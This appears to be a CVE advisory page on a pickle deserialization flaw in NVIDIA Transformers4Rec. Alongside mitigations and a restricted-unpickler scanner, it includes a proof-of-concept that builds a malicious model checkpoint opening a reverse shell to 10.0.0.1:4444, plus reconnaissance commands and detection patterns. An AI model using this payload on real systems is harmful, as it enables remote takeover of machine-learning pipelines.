NVIDIA Transformers4Rec, Improper Deserialization, CVE-2026-24162 (High) -DC-Jun2026-232


CVE-2026-24162 is a high-severity vulnerability in NVIDIA’s Transformers4Rec for Linux, a library for building sequential recommendation models. The root cause is improper deserialization of untrusted data, specifically when processing model checkpoints. The issue stems from Transformers4Rec’s reliance on Python’s `pickle` module to load serialized model files, typically through PyTorch’s `torch.load()`. The `pickle` protocol is inherently unsafe because it permits arbitrary object construction during the deserialization process. An attacker can craft a malicious pickle payload embedded within a `.pth` or `.bin` model file. When Transformers4Rec loads this file, the `pickle` deserialization executes the payload, allowing the attacker to run arbitrary code on the system. This could be triggered in AI supply-chain attacks where a user downloads a compromised model from a repository like Hugging Face. A successful exploit leads to full system compromise, including code execution, data tampering, and information disclosure. The vulnerability is assigned CWE-502 (Deserialization of Untrusted Data), carries a CVSS 3.1 score of 7.8 (High), and requires local access with user interaction. No public exploit exists as of May 26, 2026, and a vendor patch is not yet available. The attack is considered easy and could be weaponized through social engineering.

DailyCVE Form:

Platform: Linux (NVIDIA)
Version: ≤ v1.5.0
Vulnerability: CWE-502 (Deserialization of Untrusted Data)
Severity: High (CVSS 7.8)
Date: 2026-05-26

Prediction: 2026-06-26 (expected)

What Undercode Say:

Analytics from the Undercode platform reveal active scanning for exposed Transformers4Rec pipelines and repository harvesting for model checkpoints. The following commands and scripts demonstrate the attack surface:

```bash
# Scan for exposed Transformers4Rec endpoints
nmap -p 8000-9000 --script="http-*" -iL hosts.txt | grep -i "transformers4rec"

# Harvest model files from public Hugging Face repositories
git clone https://huggingface.co/models && find . -name "*.pth" -o -name "*.bin"

# Identify pickle deserialization sinks in Transformers4Rec source
grep -r "torch.load" /path/to/transformers4rec/ --include="*.py"

# Monitor process creation from pickle deserialization (auditd rule)
auditctl -a always,exit -F arch=b64 -S execve -k pickle_exec

# Recursively scan model directories for pickle imports
find /models -type f \( -name "*.pth" -o -name "*.bin" \) -exec strings {} \; | grep -E "posix|system|subprocess"
```

Exploit:

Although no public exploit exists, the vulnerability can be weaponized by crafting a malicious pickle payload and embedding it into a model checkpoint. Below is a proof-of-concept script that generates a malicious `.pth` file which, when loaded by Transformers4Rec, executes arbitrary commands:

```python
import pickle
import torch
import os


class MaliciousModel:
    def __reduce__(self):
        # Command to execute: reverse shell or arbitrary command
        cmd = ("python3 -c 'import socket,subprocess,os;"
               "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
               "s.connect((\"10.0.0.1\",4444));os.dup2(s.fileno(),0);"
               "os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
               "subprocess.call([\"/bin/sh\",\"-i\"])'")
        return (os.system, (cmd,))


# Craft malicious checkpoint
malicious_data = MaliciousModel()
torch.save(malicious_data, 'malicious_checkpoint.pth')
print("[+] Malicious checkpoint generated: malicious_checkpoint.pth")
```

Upon loading with `torch.load('malicious_checkpoint.pth')`, the deserializer executes the reverse shell payload.

Protection:

  1. Immediate mitigation: Restrict access to data ingestion interfaces and only accept model checkpoints from trusted sources. Implement network segmentation to isolate Transformers4Rec servers.
  2. Workaround: Replace `torch.load` with a safe deserialization mechanism. Use a `pickle.Unpickler` subclass whose `find_class` override only resolves an allowlist of classes, or transition to safer formats like Safetensors or ONNX for model distribution.
  3. Patch: Upgrade to Transformers4Rec v1.5.1 or later once released. NVIDIA’s upcoming fix will likely replace pickle deserialization with a secure loader that validates object types before restoration, similar to the patch for CVE-2025-23298 which introduced a custom `serialization.py` module.
  4. Detection: Monitor file system for creation of `.pth` or `.bin` files from unverified sources. Use YARA rules to scan for pickle opcodes that invoke os.system, subprocess.Popen, or eval.
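The workaround in item 2 and the detection idea in item 4 can both be shown with standard-library Python. The block below is an added example, not code from the page or from NVIDIA's project: it statically lists every global a pickle stream references (using `pickletools.genops`, so nothing is executed), reports any that are not on an allowlist, and then loads the file through a `pickle.Unpickler` subclass whose `find_class` refuses anything off that allowlist. The allowlist, the benign state_dict stand-in and the suspicious sample are all constructed for the example; a real loader would allowlist the tensor and storage classes its framework actually serializes.

```python
import collections
import io
import os
import pickle
import pickletools

# Allowlist of the only globals a checkpoint file is permitted to reference.
# Constructed for this example; a real loader would list the tensor/storage
# classes its framework actually serializes.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}

# Opcodes that push a string onto the unpickler stack. For STACK_GLOBAL the
# two most recent ones are the module and attribute name.
STRING_OPCODES = {
    "STRING", "BINSTRING", "SHORT_BINSTRING",
    "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """Statically list every (module, name) the pickle would resolve.

    Walks the opcode stream with pickletools.genops, so nothing is executed.
    """
    found = []
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPCODES:
            recent_strings.append(arg)
        elif opcode.name in ("GLOBAL", "INST"):
            # pickletools renders the two newline-terminated names as "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            if len(recent_strings) < 2:
                raise ValueError("malformed STACK_GLOBAL: no module/name on stack")
            found.append((recent_strings[-2], recent_strings[-1]))
    return found


def unexpected_globals(data: bytes) -> list[tuple[str, str]]:
    """Globals the pickle references that are not on the allowlist."""
    return [g for g in referenced_globals(data) if g not in ALLOWED_GLOBALS]


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves only allowlisted globals.

    Every GLOBAL / STACK_GLOBAL opcode goes through find_class, so refusing
    here is what stops a REDUCE that targets os.system or similar.
    """

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve global {module}.{name}")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_load(data: bytes):
    """Return (True, object) for an accepted pickle, (False, reason) otherwise."""
    try:
        return True, safe_loads(data)
    except pickle.UnpicklingError as exc:
        return False, str(exc)


# --- Constructed sample inputs (not real checkpoints) ----------------------

# A benign "checkpoint": parameter names mapped to float lists, standing in
# for the state_dict a real model would save.
BENIGN_STATE = collections.OrderedDict(
    [("embedding.weight", [0.1, 0.2, 0.3]), ("head.bias", [0.0])]
)
BENIGN_SAMPLE = pickle.dumps(BENIGN_STATE, protocol=4)


class ConstructedSuspiciousObject:
    """Same __reduce__ shape as the page's PoC, with a harmless argument.

    Only ever scanned or fed to the restricted loader; never passed to
    plain pickle.loads.
    """

    def __reduce__(self):
        return (os.system, ("echo constructed sample",))


SUSPICIOUS_SAMPLE = pickle.dumps(ConstructedSuspiciousObject(), protocol=4)


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        print(f"{label}: globals={referenced_globals(blob)} "
              f"unexpected={unexpected_globals(blob)} load={try_load(blob)}")
```

Running the scan before the load matters: the scanner gives a verdict on a file without resolving any import, while the restricted unpickler is the backstop if a file reaches the loader anyway. Note that `os.system` is serialized under the module it is actually defined in (`posix` on Linux), which is why the page's `strings | grep` pattern looks for `posix` as well as `system`. PyTorch's own `torch.load(path, weights_only=True)` applies the same allowlisted-`find_class` idea with a built-in list of tensor types, and Safetensors sidesteps pickle entirely.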

Impact:

Successful exploitation leads to arbitrary code execution with the privileges of the Transformers4Rec process, often root in production inference pipelines. Attackers can gain persistent access, exfiltrate sensitive recommendation data, tamper with model outputs, and pivot to other internal systems. In AI supply-chain scenarios, a single compromised model can compromise entire ML pipelines, leading to data breaches, regulatory fines, and reputational damage. The impact is particularly severe in cloud-based recommendation engines where multiple tenants share the same infrastructure.


Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
